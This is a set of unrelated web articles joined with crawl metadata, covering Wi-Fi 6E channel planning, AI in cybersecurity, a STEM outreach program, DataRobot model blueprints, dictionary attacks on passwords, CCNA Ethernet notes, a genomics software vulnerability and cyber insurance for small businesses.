With wired networking, if we needed additional capacity, one could easily add another switch, thus providing additional ports and a known throughput through the uplinks. With wireless networking on the other hand, it is not as easy. Adding an extra AP may not increase wireless capacity as much as you would think. Let’s look at it slightly differently. Imagine you oversee the designing and building of a complex system of roads to get people in and out of your town. The easiest way to accomplish this is to create a single-lane, bi-directional roadway. Traffic can easily flow in their respective lanes in and out of town. Now, fast-forward a few years, and you have a fantastic vibrant downtown center, thus increasing traffic on your single-lane road, which requires you to invest in a multi-lane roadway. Each of these lanes is equivalent to our channels in wireless. The more lanes we have, the more traffic we can support at any time. Once a lane is occupied, though, congestion can start to form. Taking this knowledge back to our original concept of adding APs, we see how if we add that AP to an already occupied channel, we don’t fully introduce additional capacity; it is a limited capacity.
Over the years, our data usage profiles have changed from email and Internet browsing to TikTok, Instagram, and Netflix. How we use these lanes has also evolved, growing from 3 to 12 to 25. But what happens when you run out of room to add lanes? 401 Highway in Ontario, Canada, is one of the busiest in the world. With over a dozen lanes, there can still be congestion, so what if we could fit more data (aka people) into a single vehicle and on a lane simultaneously?
“Adding an extra AP may not increase wireless capacity as much as you would think.“
These heavy data usage applications are oversized loads on a roadway. The average lane is around 3 – 4m in width, a known measurement, just like the bandwidth available in channel width, is a known theoretical maximum. Two lanes are required to clear a payload size of 6m in
width. We can accommodate that on the roads by allowing vehicles to straddle both lanes using pilot vehicles and traveling at non-congested times. With wireless, we adapt to these oversized loads by leveraging larger channel widths than 20MHz, such as 40MHz, 80MHz, and even 160MHz, which is done by combining multiple channels into a single channel. Sounds great. Well, there is a downside to this. Our 25 channels in 5GHz suddenly become 12, or even 2 at 160MHz! By combining the 25 channels in 5GHz, we effectively reduce our overall aggregate throughput and capacity. Because of this, more spectrum is needed for wireless devices and 6GHz solves that need.
6GHz to the Rescue! 6GHz represents the potential for 1200MHz worth of usable spectrum, depending on geographical region. We don’t necessarily need the 59 20Mhz channels or even the 29 40MHz channels. The benefit of 6GHz truly is the 14 80MHz or 7 160MHz channels available in addition to the 25 20MHz or 12 40MHz channels in the 5GHz band. Now we can easily direct high data usage devices, such as streaming and virtual reality devices, to associate solely to the 6GHz band, allowing 80MHz and 160MHz channel bandwidth, and letting them band roam to 5GHz when needed.
For the first time in a while, we can have a clean slate that will allow us to start with new design guidelines and no preconceived notions about the “recommended” way of doing things. Client devices are required to support WPA3 to operate in the 6GHz band. This requirement is a driving factor to deploy a new network name (SSID) that solely operates in the 6GHz band. There is no requirement for us to have to support older legacy devices!
To further assist with the allocation of the frequency, three new device classes have been created: Low Power Indoor (LPI) AP, Standard Power (SP) AP, and Very Low Power (VLP) AP.
LPI devices are fixed indoor-only APs and operate in such a way that they reduce their impact on incumbent services already operating within the 6GHz band. By limiting the EIRP (radiation power) to 30dBm at the AP and 24 dBm at the client, we will be able to utilize the 1200MHz spectrum at higher channel widths efficiently. LPI APs EIRP will be enforced by requiring permanently attached integrated antennas. This removes the ability to add a higher gain antenna and increases the EIRP above the maximum limits.
SP devices are primarily designed for indoor and outdoor usage but will operate in a subset of the 6GHz band, U-NII-5, and U-NII-7. Because these devices are authorized for outdoor use, the maximum EIRP is increased to 36 dBm. As this higher EIRP may interfere with existing incumbent users on the 6GHz band, here in the US, the FCC requires a spectrum management service to be used called Automatic Frequency Coordination (AFC). When an outdoor device comes online, it is necessary to communicate with a local AFC system to retrieve a list of allowed and prohibited frequencies using geolocation. While this is new to the Wi-Fi world, CBRS and other technologies have used this for some time already.
The final device class, VLP, is designed for transportation vehicles such as cars, trains, and others. The maximum EIRP for this class will be around 14 dBm. VLP could also be leveraged for high throughput personal area network devices such as VR headsets. Time will tell what happens with VLP, as the primary focus seems to be on LPI and SP devices.
Regardless of which class of device you deploy on 6GHz, one of the goals is to be better RF neighbors and coordinate usage while also allowing crosstalk amongst different device classes. Through these new device classes, we can finally see the real-world benefits of using 80Mhz and 160Mhz channel widths in the enterprise, not just at home!
The Need for Multi-Gigabit Ethernet
As we use these 80MHz and 160MHz channel widths, we cannot forget about our wired backhaul. The massive channels supporting these data-hungry applications are like the G4 Beijing-Hong Kong-Macau Expressway checkpoint that merges 50 lanes into 20!
As you evaluate new wireless equipment, ensure the Wi-Fi 6E APs you are looking at support either 802.3ad, Link Aggregation Control Protocol (LACP), or mGig, enabling support for either 2.5Gbps or 5Gbps. It is also worthwhile to pull two cables to every AP now, not just for the sake of redundancy, but to take advantage of LACP on mGig as well, enabling the possibility of dual 2.5Gbps or dual 5Gbps! Imagine pushing all that data traffic from your Wi-Fi 6 devices onto a single gigabit Ethernet connection. With Wi-Fi 6 it is possible to oversubscribe a 1Gbps Ethernet uplink.
We hope you enjoyed this look at Wi-Fi 6 channels and can appreciate that what we once considered the “norm” for channel design should be challenged with Wi-Fi 6. We have 1200MHz worth of new spectrum to set the tone for how we want to leverage it with our plans. Let’s push away from the past and embrace the bandwidth the 6GHz band brings to a new world of devices. And remember, as you design for these new challenges, the EtherScope nXG from NetAlly fully supports Wi-Fi 6 and the 6GHz band for analysis, and mGig Ethernet testing for end-to-end connectivity troubleshooting and validation. For wireless specialists, the AirCheck G3 Wireless Analyzer features all the power of the EtherScope nXG but without wired Ethernet testing (available Q4-2022).
Blake Krone is an independent Mobility Consultant and developer. His primary focus is providing solutions for the next generation of devices and business use cases for many Fortune 500 companies and startups. He has developed training materials and presentations through his experience deploying some of the largest single-site networks, sharing the knowledge and insights gained. When he isn’t designing and deploying networks, he builds data analysis tools and tests client devices and tools. | <urn:uuid:1838053a-e964-4b38-afe9-b95ad5bf4be7> | CC-MAIN-2022-40 | https://www.netally.com/wi-fi-6/wifi-6-designing-for-6ghz-channels/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00187.warc.gz | en | 0.936683 | 2,244 | 2.546875 | 3 |
Financial Services , Marketing , Retail
That promising view of what AI can deliver is not entirely wrong.
Businesses to governments are starting to face up to the vulnerabilities of everything being online. Sophisticated and disruptive cyber attacks are continuing to increase in complexity and scale across multiple industries. Areas of critical infrastructure from energy to critical manufacturing have vulnerabilities that make them a target for cybercriminals.
Just as businesses and authorities are beginning to understand the role that AI and machine learning will play in protecting them, criminals are using the same tools to get around defenses. With AI and machine learning showing encouraging signs of changing the face of cybersecurity, can these technologies break through the hype to truly help the cyberspace?
Where Do We Begin?
Fortunately, researchers developing new defenses at companies throughout North America largely agree on both the potential benefits and challenges. And it starts with getting some terminology straight.
“”I actually don’t think a lot of these companies are using artificial intelligence. It’s really training machine learning. It’s misleading in some ways to call it AI, and it confuses the hell out of customers.” – Marcin Kleczynski, CEO of the cybersecurity defense firm Malwarebytes commenting on the correct terminology for AI and Machine Learning.
It is important to get the terminology straight in order to adapt to security breaches. Since machine learning is a branch of artificial intelligence that refers to technologies that enable computers to learn and adapt through experience, distinguishing between the two provides a vital strategic initiative that businesses need to adapt to in order to truly be prepared for an attack.
Moreover, a weaponized AI in the hands of bad actors is a very worrying concept. However, it also highlights the importance of investing heavily in AI-defense and research. Thankfully, emerging machine-learning models are offering hope and greater protection against these sophisticated and complex threats, bringing to light the well-known “hype” that is surrounding the technologies.
Is it More than a Hype? It’s Complicated
With both sides using the same tools, systems will have the ability to learn patterns and identify deviations in a manner that traditional systems or analysts could ever dream of. Traditional protection methods involved the need for prior knowledge of a threat type before a defense could be prepared. This luxury is now confined to the history books.
To say that AI is just hype is to ignore both the significant and not-insignificant breakthroughs that have been made in the field, which are breakthroughs that are currently living in your smartphone and computer, for example. It also ignores the fact that not every AI has to have human-level intelligence in order to carry out its tasks.
“The answer to whether or not AI is just hype is complicated. The current boom is in some ways the result of companies inflating the abilities of their products, but there are also many companies out there doing extraordinary work. Ultimately, AI has a ways to go, but the advances already out there: advanced driver-assistance systems, facial recognition, voice assistants – are proof enough of the incredible potential that AI has to transform our lives and the way we work.” MediaPost reports.
Advances in technology are now enabling the rise in security systems that are always learning, adapting, and looking for new ways to preempt unseen methods of attack. Essentially, the most significant change is stopping attacks before they even occur.
Businesses should already be thinking about replacing reactive solutions with always online protection that is continuously learning emerging attack methodologies. We are entering a new digital era where AI and machine learning will undoubtedly redefine cybersecurity, and we have to take the appropriate measures to be prepared.
About The Transformational CISO Assembly
In a new digital world, driven by data, businesses of all sizes are working tirelessly to secure their networks, devices, and of course, their data. CISOs need to plan for worst-case scenarios, stay ahead of latest IT Security transformation technology, and maintain their company’s information assets without losing sight of the corporate culture.
The 7th edition of our Transformational CISO Assembly will bring together industry leaders to discuss the latest strategies and innovations in cybersecurity. Join us today, the assembly is now open for application!
Jenny Schecher is a Client Services Director & Social Media Manager at The Millennium Alliance. Jenny is an avid contributor to our blog, Digital Diary, as well as all social media platforms. When she is not writing about digital transformation and technology, she is working with her team to make visions come to life at our events. (and eating all of NYC's best food.) Follow her on Instagram: @jennyschecs or find her on LinkedIn!
Reach thousands of C-Level
Executives every month.
Do you have content that you feel will
resonate with our audience? We'd love to
welcome you as a guest contributor!
Premium content to our readers
interested in all things business.
Millennium Membership offers Fortune 1000 C-Level executives, leading public sector/government officials, and thought leaders across a variety of disciplines unique and exclusive opportunities to meet their peers, understand industry developments, and receive introductions to new technology and service advancements to help grow their career and overall company value.About Millenium Alliance
Launched in 2017, Digital Diary was created to provide premium content to our members interested in executive education and business transformation. With C-Suite executive and top academic contributors, interviews with industry leaders, and digital transformation insights from technology experts, Digital Diary has all of the professional development tools you need to stay ahead of the curve.
We are dedicated to distributing meaningful opportunities for our reader to increase their personal knowledge, simplify business initiatives, and to have the right information to build their capabilities and leadership skills at every level.
In the midst of disruption across all industries, our members are given the tools they need to digitally transform their organizations.
Joining Mill All is an opportunity unlike any other to connect with the best professionals in your industry and be a part of a community to become the best leader you can be.
500 Companies Attend Each Year | <urn:uuid:b0b89293-cbc2-43c7-bef5-afd73b5e015c> | CC-MAIN-2022-40 | https://mill-all.com/digital-diary/can-artificial-intelligence-overcome-the-hype-to-help-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00187.warc.gz | en | 0.947881 | 1,273 | 2.5625 | 3 |
In classrooms across the country every day, students are told to turn off and put away their devices. But we know that having great technology in the hands of students is critical to preparing them to join a 21st century workforce built on ones and zeros.
GDIT is partnering with schools in St. Louis, home to the company’s new geospatial innovation center, to bring innovative, hands-on science, technology, engineering, and math learning opportunities, known as STEM, to classrooms. Created in partnership with STEMBoard, the project-based kits help introduce students to basic coding skills with self-paced activities that teach the fundamentals of coding to students in a fun and accessible way.
These fun coding lessons, called LINGO Lessons, help students learn through experience: “In the Driver’s Seat,” teaches students how to build a driverless automobile’s back-up sensor; “Music through Movement,” teaches students to interact with sensors and build instruments that “play” with a wave of a hand; and “Reaction Time,” teaches students how to build a reactive, two-player game that tests speed by combining sports, electronics, and hand-eye coordination.
GDIT and STEMBoard provided the LINGO lessons to support the STEM-capacity building work GDIT was already doing with non-affluent, on-the-rise schools in the St. Louis area. GDIT is also working with STEMBoard to create a geospatial-intelligence-specific “GEO LINGO” lesson for high school students, helping students visualize and map data, which will be in schools during the next academic year.
To ensure the program’s success, GDIT and STEMBoard worked with teachers to develop the curriculum and training. As the pandemic required certain aspects of the program to be conducted virtually, GDIT and STEMBoard leveraged a blended learning model for introducing and walking students through their LINGO lessons while building institutional capacity by helping teachers learn to present these new tools.
During the fall semester, GDIT engineers and other employees visited classrooms to provide experiences that students could connect with. Many of the students had never met an engineer at all, much less one who is also a minority, who looks like them. The resources GDIT and STEMBoard brought into the schools are ones the schools might not otherwise have had access to. Meeting real people who have done the work, can talk about it and want to give back makes it much more real and much easier for the students to see themselves in a STEM career.
“GDIT is increasingly concerned about the widening gap among students who are prepared to join a digital workforce and those who aren’t,” said Deb Davis, vice president mission solutions. “This investment in students, which we look forward to growing, is an investment in the pipeline of future technologists who will work at GDIT’s St. Louis offices and beyond.”
“By providing critical STEM resources to teachers and students, GDIT is directly inspiring the emerging workforce.” STEMBoard founder Aisha Bowe said. “When we bring LINGO to the classroom in St. Louis, we watch students go from ‘I can’t do this,’ to ‘I am doing this,’ to ‘I am immersed in this,’ to ‘I can’t believe people get paid to do this!’ all in the span of a week. It’s really incredible.”
“There’s now a ‘train the trainer’ element to the work that builds institutional capacity in schools,” Aisha continued. “Next year, we can go with GDIT to new schools and reach new students knowing that the teachers we worked with this year are doing the same with their current students.”
The partnership with STEMBoard and with other like-minded organizations in St. Louis is an extension of GDIT’s longstanding commitment to the geospatial community in the region. In 2021, we celebrated our expanded footprint with a new home in the city’s Cortex Innovation Community (CIC), making a significant investment and continuing our commitment to the community. | <urn:uuid:6d3da807-3bc5-478b-8516-d7c04d96291a> | CC-MAIN-2022-40 | https://www.gdit.com/perspectives/latest/inspiring-next-generation-stem-leaders/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00187.warc.gz | en | 0.960378 | 885 | 3.25 | 3 |
How to Understand a DataRobot Model: Unlocking How a Model Was Made [Part 7]
One of my favorite things about Chinese culture is going out with friends and family for dim sum on the weekend. Dim sum is prepared as small bite-sized portions of food served in small steamer baskets or on small plates. Dim sum dishes are served for brunch or lunch. In my hometown, dim sum is also known as yum cha, and my friends and I would organize large groups to go to Chinatown on the weekend to dine.
But despite my love for dim sum, I’m not well suited to this cuisine. I have a seafood allergy and many dim sum dishes contain shrimp. I’m constantly asking my wife, “What’s in this dumpling?” or “Does this contain seafood?” and waiting for her to translate the dishes into English for me. I know the dishes are going to be yummy, but I also care about what went into them.
Just as I care about the ingredients in my dim sum, some people want to know the ingredients in the machine learning algorithm that powers their artificial intelligence (AI). They want to know how the data was prepared to suit the algorithm, any feature engineering applied to the data, and whether any post-processing was applied to the algorithm’s results.
In the previous blogs in this series, we learned how to assess the model accuracy, which columns and rows are important in the data, and how to discover the patterns in the data that the model is using. In this blog, we will focus on the section of the cheat sheet marked in green above–discovering how to see the data preparation, feature engineering, and post-processing that each blueprint has used. Model blueprints are the core of DataRobot’s technology, encapsulating data processing, feature engineering, and model tuning.
Data processing and feature engineering are often overlooked when building machine learning models, even though they are essential to building a great model and are much more complicated to master. Research shows that “selecting the best model and tuning it leads to approximately a 20% increase in accuracy, up to more than a 60% improvement for certain datasets”. DataRobot’s model blueprints are data science recipes, combining best-practice data science processes as the ingredients, used and tested by the world’s best data scientists, packaged ready to produce high-quality machine learning algorithms. And this production-line quality and accuracy directly impacts the bottom line. One organization that switched to DataRobot’s model blueprints reported saving hundreds of millions of dollars per annum via improved model accuracy.
Historically, data scientists manually created scripts that trained and ran the machine learning algorithms that powered AI. Each script was craftsman made, a work of art, and each one unique. Scripts can be written in many different languages (e.g., Python, Java, Julia or R), but one thing that all scripts have in common is that they are not suitable for a normal business person to understand. Over the past decade, many standard machine learning libraries have been released by the open source community, removing the need to script every detail, but scripts that use these libraries remain too complex for a normal business person to comprehend. Scripted solutions are little better than black box solutions to anyone who is not an experienced data scientist.
In the modern AI-driven organization, there are dozens, if not hundreds, of machine learning algorithms deployed throughout the organization, too many for each and every one to be built manually using complex scripting. Much like modern organizations manage their software, the modern AI-driven organization wants standardization of AI workflows, repeatability, reduced human error, reduced key-man risk, and human-friendly and regulator-friendly documentation of each and every AI.
In the previous blog in this series, we saw how to obtain the mathematical formula for a trained algorithm. But sometimes there is a need to see the inside of the model to see how it prepares the data, newly generated features, and any post-processing it does. For example, one blueprint may improve accuracy by applying credibility weighting, while another may use automated feature engineering to improve accuracy by adding cluster analysis. Sometimes there is a need to find the source of an algorithm, the academic papers behind its methodology, or the open source library from which it was sourced. Maybe the regulator wants to know the details. Maybe your boss, the Analytics Director, wants to know how this model is different from another model that you fitted to this data. Maybe one of your fellow data scientists wants to review your choice of model or wants ideas about what may work for their project. Or maybe one of your business colleagues wants to know whether the text features were used after the other features had first been applied.
Above is a screenshot of a more complex model blueprint for a Gradient Boosted Greedy Trees algorithm fitted to Lending Club’s loan data, used to predict which loans will go bad. Blueprint diagrams always start with a Data box and end with a Prediction box. After the Data box, each feature is split by its data type, so that the most appropriate pre-processing can be applied to prepare it for the algorithm. The next rounds of boxes are for data processing and feature engineering. Then there is a machine learning algorithm taking this data, to learn from, or to calculate new predictions. Sometimes there is an extra step after the machine learning algorithm, where text mining is trained on the residual errors from the main algorithm, or sometimes there is a prediction scaling step after the main algorithm. You can find a quick explanation of this particular blueprint in our blog about automated feature engineering.
To get the documentation for any step, simply click on the box for that step. This will open documentation that explains what that box does within the pipeline and often provides links to published research and/or the open sources libraries it uses.
How to Interpret the Blueprint Diagram Above:
- The features are split by data type into categorical, numeric, and text.
- For categorical features:
- the data is prepared by applying one-hot encoding, and
- new features are generated by counting the occurrence.
- For numeric features:
- the data is prepared by doing missing value imputation, and
- new features are generated by subtracting one numeric field from another, or by dividing one numeric field by another.
- For text features, the raw text data is turned into numeric data, suitable for this machine learning algorithm, by first running text mining algorithms on each of the three text features in this data.
- The main algorithm being used is a Gradient Boosted Greedy Trees Classifier with Early Stopping. Clicking on the box to get the documentation shows us a description of what this algorithm does and tells us that this algorithm was sourced from the scikit-learn library in Python.
- There is no post-processing after the main algorithm. Text mining is used to create primary features to fit against the target column. No scaling of predictions is required.
The path to trusting an AI includes knowing whether the way it is using the data is suitable and reasonable. The path to building an AI involves training multiple machine learning algorithms to find the one that best suits your needs, and the only practical way for you to quickly find the model that is suitable is to use automated machine learning, which generates visualizations of the pipelines of each and every blueprint. If your AI is a black box that can’t visualize the pipelines it uses, then it’s time to update to DataRobot for models that you can trust. Click here to arrange for a demonstration of DataRobot’s human-friendly insights, showing how you can trust an AI. | <urn:uuid:7b70d757-3c15-4d27-a73b-2fcb7ed864fd> | CC-MAIN-2022-40 | https://www.datarobot.com/blog/how-to-understand-a-datarobot-model-unlocking-how-a-model-was-made-part-7/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00187.warc.gz | en | 0.941862 | 1,610 | 2.6875 | 3 |
Learning Password Security Jargon: Dictionary Attack
We, as users, trust companies and service providers to keep our data safe. We hope that they don’t leave any backdoors in their software, properly train their employees, and don’t store usernames and passwords in plaintext.
But everything is not as simple as it might seem. Cybersecurity attacks can affect anyone, and sometimes it may be difficult to protect yourself or your business. But some of them, like dictionary attacks, can be easily prevented.
Learn what a dictionary attack is and what can you do to stop it from happening.
What is a dictionary attack?
A dictionary attack is a systematic method of guessing a password by trying many common words and their simple variations. Attackers use extensive lists of the most commonly used passwords, popular pet names, fictional characters, or literally just words from a dictionary – hence the name of the attack. They also change some letters to numbers or special characters, like “[email protected]”.
Hackers use this attack to gain access to online accounts, but also for file decryption – and that’s an even bigger problem. Most people put at least some effort into securing their email or social media accounts. However, they choose simple, easy-to-remember everyday words to protect the files they share with other people. If sent over an unsafe connection, those files would be very easy to intercept, and guessing the password by using a dictionary attack wouldn’t be a challenge either.
How does a dictionary attack work?
During a dictionary attack, a program systematically enters words from a list as passwords to gain access to a system, account, or encrypted file. A dictionary attack can be performed both online and offline.
In an online attack, the attacker repeatedly tries to log in or gain access like any other user. This type of attack works better if the hacker has a list of likely passwords. If the attack takes too long, it might get noticed by a system administrator or the original user.
During an offline attack, however, there are no network limitations to how many times you can guess the password. To do it, hackers need to get their hands on the password storage file from the system they want to access, so it’s more complicated than an online attack. But once they have the correct password, they will be able to log in without anyone noticing.
What is the difference between a brute force attack and a dictionary attack?
Brute force attacks are also used to guess passwords. They mostly rely on the computing power of the attacker’s computer. During a brute force attack, a program also automatically enters combinations of letters, symbols, and numbers, but in this case, they are entirely random. Brute force attacks can also be performed online and offline.
However, there are 1,022,000 words in the English language. By using the alphabet and numbers 0-9, you can make 218,340,105,584,896 eight-character passwords. In this case, a dictionary attack is much more likely to succeed, given that the password will be a simple English word. And it will most likely be a simple English word. A basic brute force attack would take much more time and is less likely to be successful.
Dictionary attacks are brute force attacks in nature. The only difference is that dictionary attacks are more efficient – they usually don’t need to try as many combinations to succeed. However, if the password is a truly unique one, a dictionary attack won’t work. In that case, using brute force is the only option.
How to avoid a password dictionary attack?
The IT department in any organization should take some precautions to protect their systems from dictionary attacks. Online attacks are rather easy to stop. You can use captchas, implement mandatory two-factor authentication, and limit how many times one user can attempt to log in before their account is locked.
It’s a bit more complicated when it comes to offline attacks, though. But you can also use two-factor authentication and set up strict rules concerning passwords: no popular passwords, no common words or phrases, 12 character minimum, etc. And most importantly, make sure that you don’t store passwords in plaintext.
But what can you do as a user to prevent your accounts from getting hacked? First and foremost – don’t be predictable. The best passwords are words that have no meaning to the general public. Keep in mind that the length of the password is not what makes it strong. It doesn’t matter whether you choose “pachycephalosaurus” or “cat” as your password; a computer takes the same amount of time to try either of them.
So create new words, use special characters originally, or, best of all, use random strings of upper- and lower-case letters, symbols, and numbers.
Having trouble coming up with new passwords? Try our password generator. You can pick what symbols you want to use and create unique, strong passwords for all your accounts. Yes, they are impossible to remember, but they are also impossible to guess. And lucky for you, you no longer need to remember all your passwords.
Just use a password manager, like NordPass, to store all your passwords safely. Only you will have access to them, so you can rest assured that your online accounts are safe.
Subscribe to NordPass news
Get the latest news and tips from NordPass straight to your inbox. | <urn:uuid:78ed2bcf-4ec4-4568-a27c-2a1452977fd3> | CC-MAIN-2022-40 | https://nordpass.com/blog/what-is-a-dictionary-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00187.warc.gz | en | 0.940275 | 1,138 | 3.515625 | 4 |
In preparation of your CCNA exam, we want to make sure we cover the various concepts that we could see on your Cisco CCNA exam. So to assist you, below we provided a CCNA Ethernet Cliff Notes article. This section will probably be most helpful to review immediately before you take your Cisco CCNA certification exam on test day!
Ethernet is the most common LAN technology in use today. Your Cisco CCNA exam will cover various concepts about Ethernet so we must make sure you are well versed in various Ethernet concepts to pass your Cisco CCNA exam.
Ethernet was pioneered by Digital, Intel, and Xerox in 1980. The IEEE modified it and set the 802.3 specification. Originally this was used to govern network communications over coaxial cable. This evolved into various other physical topologies using hubs and Cisco switches employing twisted pair Ethernet cabling. This provided greater flexibility in the setup, deployment and performance of the computer networks. Obviously your Cisco routers and Cisco switches will support Ethernet.
Ethernet Transmission Mode
Using your twisted pair Ethernet cable, you have the following duplex modes:
Half Duplex: Uses one pair of wires, only one party is allowed to transmit data at any given time. Uses CSMA/CD. This is similar to walkie-talkie communications where only one person can speak at a time or no one can understand the other because there is just static interference. Full Duplex: Uses one pair of wires, Tx to Rx & Rx to Tx. When connected back-to-back, collisions will not occur. This is similar to a telephone where two people can talk at one time, and hear each other so the communications are not canceled out as in half duplex.
Autonegotiation: Ethernet uses a priority scheme to define preferred options. For 100-Mbps and 10-Mbps Ethernet, the lower the priority value the more preferred Auto negotiation uses a series of Fast Link Pulses (FLPs) to communicate with the device on the other end of the cable.
802.2 frame is 802.3 frame with LLC inside the data field of the header.
MAC Address: 48 bit long, 6 bytes. The first 24 bits are IEEE assigned to a card which identifies the vendor of the card. The last 24 bits are vendor assigned which “should” make every MAC address unique. But this is not always the case with cheap NICs from the Orient.
Multicast Address: (0100.5exx.xxxx)
Functional Addresses: Valid only on Token Ring. It identifies one or more interfaces that provide a particular function.
The bits of each byte of an Ethernet frame are reversed when translated to Token Ring or FDDI frame. Here is an example of the MAC address conversion:
Ethernet MAC: 0200.ECA2.0080
Same MAC in TokenRing: 4000.3745.0001
Frame Elements –These are the different components that make up a frame.
Cyclic Redundancy Check(CRC): Provide error detection, but not error correction.
Frame Check Sequence(FCS): Located at the end of the frame. Contains the CRC.
DA: Destination MAC address.
SA: Source MAC address.
Preamble: Altering 0s and 1s used syncronize the recieving interfaces.
Start Frame Delimiter (SFD/Synch): Used by Peamble to indicate data will follow.
Length (for Ethernet II): Lists frame length.
Type(for 802.3): Identifiesthe data type.
Data: Size ranges from 46 to 1500 bytes
Ethernet Maximum Length Specifications:
10Base2 802.3 185m
10Base5 802.3 500m
10BaseT 802.3 100m
100BaseTx 802.3u 100m
In preparation of your CCNA exam, we want to make sure we cover the various concepts that we could see on your Cisco CCNA exam. So to assist you, below we will discuss on of the more difficult CCNA concepts; Cisco CCNA Ethernet Cliff Notes. As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes easier. So even though it may be a difficult concept and confusing at first, keep at it as no one said getting your Cisco certification would be easy! | <urn:uuid:08c5d76b-27ff-4b5d-af48-1c279bc74192> | CC-MAIN-2022-40 | https://www.certificationkits.com/ccna-ethernet-cliff-notes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00387.warc.gz | en | 0.870669 | 957 | 3.3125 | 3 |
Some Sandia National Laboratories researchers discovered that the open software utilized by genomic researchers had a vulnerability. If an attacker exploits this vulnerability, he could access and modify sensitive genetic data.
There are two steps involved in DNA screening. The first step is the sequencing of a patient’s DNA and the mapping of their genome. The second step is the comparison of the patient’s genetic data with a standardized human genome using a software tool. The purpose of assessing any differences between the two is to find out if genetic differences are because of diseases.
The CVE-2019-10269 vulnerability discovered by Sandia researchers is a stack-based buffer overflow vulnerability. A lot of researchers use the Burrow-Wheeler Aligner (BWA) program for conducting medical diagnostics based on DNA. The vulnerability can be found when the BWA is importing from government servers the standardized human genome. Patient data is sent through an insecure channel and may be acquired in a man-in-the-middle attack.
The standardized human genome may be intercepted by an attacker and combined it with malware. Then, both the malware and genome are transmitted to the BWA user’s device. The installed malware could change the result of the patient’s DNA analysis at the time of genome mapping. Hence, the resulting DNA analysis may be inaccurate.
An attacker can change DNA mapping data so that a patient would appear to have no disease, and delay the receiving of treatment by the patient. The altered DNA analysis could also be made to show that a patient possesses a disease, and doctors may be led to give needless medications thus potentially harming the patient.
After the discovery of the vulnerability, Sandia informed the developer of the software and the U.S. Computer Emergency Readiness Team (US-CERT). A patch was developed by the software developer for the latest software version and so far, there is no report that show the exploitation of the vulnerability in real-world attacks.
This is a critical vulnerability and has a CVSS v3 base score of 9.8 out of 10. An attacker with low-level skill can exploit the vulnerability.
All BWA program users need to update their software to the latest version immediately to stop the future exploitation of the vulnerability. The researchers likewise advised developing a way to prevent the alteration of sequenced DNA data and to use secure, encrypted channels only when sending sensitive data.
The researchers also told security researchers to assess genomics software program for comparable flaws. Although the BWA vulnerability has been solved, identical vulnerabilities may be present in other genomics mapping software programs. | <urn:uuid:88384954-d14b-4b98-b45b-4a595cf94422> | CC-MAIN-2022-40 | https://www.hipaanswers.com/researchers-found-critical-vulnerability-in-burrow-wheeler-aligner-genomics-mapping-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00387.warc.gz | en | 0.929883 | 527 | 2.953125 | 3 |
In participation with the National Cybersecurity Alliance and in celebration of Cybersecurity Awareness Month, CyberPolicy is proud to promote cybersecurity education by providing resources for small business owners to plan for, prevent, and insure against cyber crime.
Cybersecurity can be a complex and intimidating topic for many business owners. But, what may seem too large for any one person to solve can actually be a very manageable task with a little knowhow. In truth, the foundations of cybersecurity are decidedly non-technical and highlight the role of the individual internet user. With some basic understanding and a little guidance, you can see that cybersecurity relies on the collective actions of individuals within an organization rather than complex or expensive software.
Read on to learn how you can own your role in cybersecurity and strengthen the integrity of your operation.
Hackers are primarily after identity data, credit card information is their secondary target.
Identity data is any information that can be used to identify a specific user, employee, contractor, client, or consumer. This includes names, addresses, email addresses, social security numbers, and more. In many cases, a name, SSN and birthdate are enough to steal someone's identity causing immense financial and credit damage.
While stolen credit cards are bad news, stolen identity data such as medical records are much worse. Hackers love to pilfer healthcare information to resell on the dark web. Digital black-marketers actually prefer medical records to stolen credit cards. Credit cards can be canceled and they expire, offering a limited window of value. This is not the case for SSNs, names or birth dates, which live on indefinitely. Even a deceased person’s identity data can be used for nefarious purposes. If your business handles customer identity data, it is your job to protect that information.
Knowing exactly what cyber criminals are looking for makes it easier to safeguard that valuable information and protect your business. Here are handful of non-technical approaches that will enable your business to better shield identity data:
-Understand that not all data needs to be saved. Protect your customers by not saving some information. After all, it can't be stolen if you don't have it. Many CRM and POS applications collect more customer data than is needed to complete a transaction. Adjust the default settings of any apps that your business uses to retain only the information that is needed to process a transaction and maintain a relationship with a client.
-Train your staff to be skeptical. Phishing and social engineering scams are used by hackers to fool employees into sharing personal or financial information. Email is the primary tool that hackers use to deliver scams to unsuspecting recipients, so this is where you want to be on the lookout. Train your staff to identify suspicious emails. As a general rule: Be weary of all messages from unknown senders and NEVER share information, click links, or download attachments from anyone that you don’t know.
-Silo your data based on who needs it most. Not every member of your organization needs access to identity data. Segment employee access based on a need-to-know basis. Fewer access points to sensitive data offers fewer opportunities for a hacker to weasel in and cause problems.
Any business conducted online or with a connected device carries a certain set of risks. That’s the reality of the tech-enabled world that we work in today. Literally every company that hires employees or contractors, processes payments, or stores customer data needs to consider the possibility of a data breach. As a business owner, the outcome of any breach falls squarely on your shoulders. Data is one of the most valuable and vulnerable assets that any business manages. Unfortunately, many business owners don’t learn this fact until it's too late, because anytime there is a data breach, lawsuits can be expected to follow.
A cyber insurance policy covers your business in the event of a hack or data breach that results in financial damages - both direct and litigatory. This type of business insurance covers an organization’s intangible assets like digital files and data. Cyber insurance may seem novel to many business owners, but it has become a necessary form of coverage for companies that use the internet.
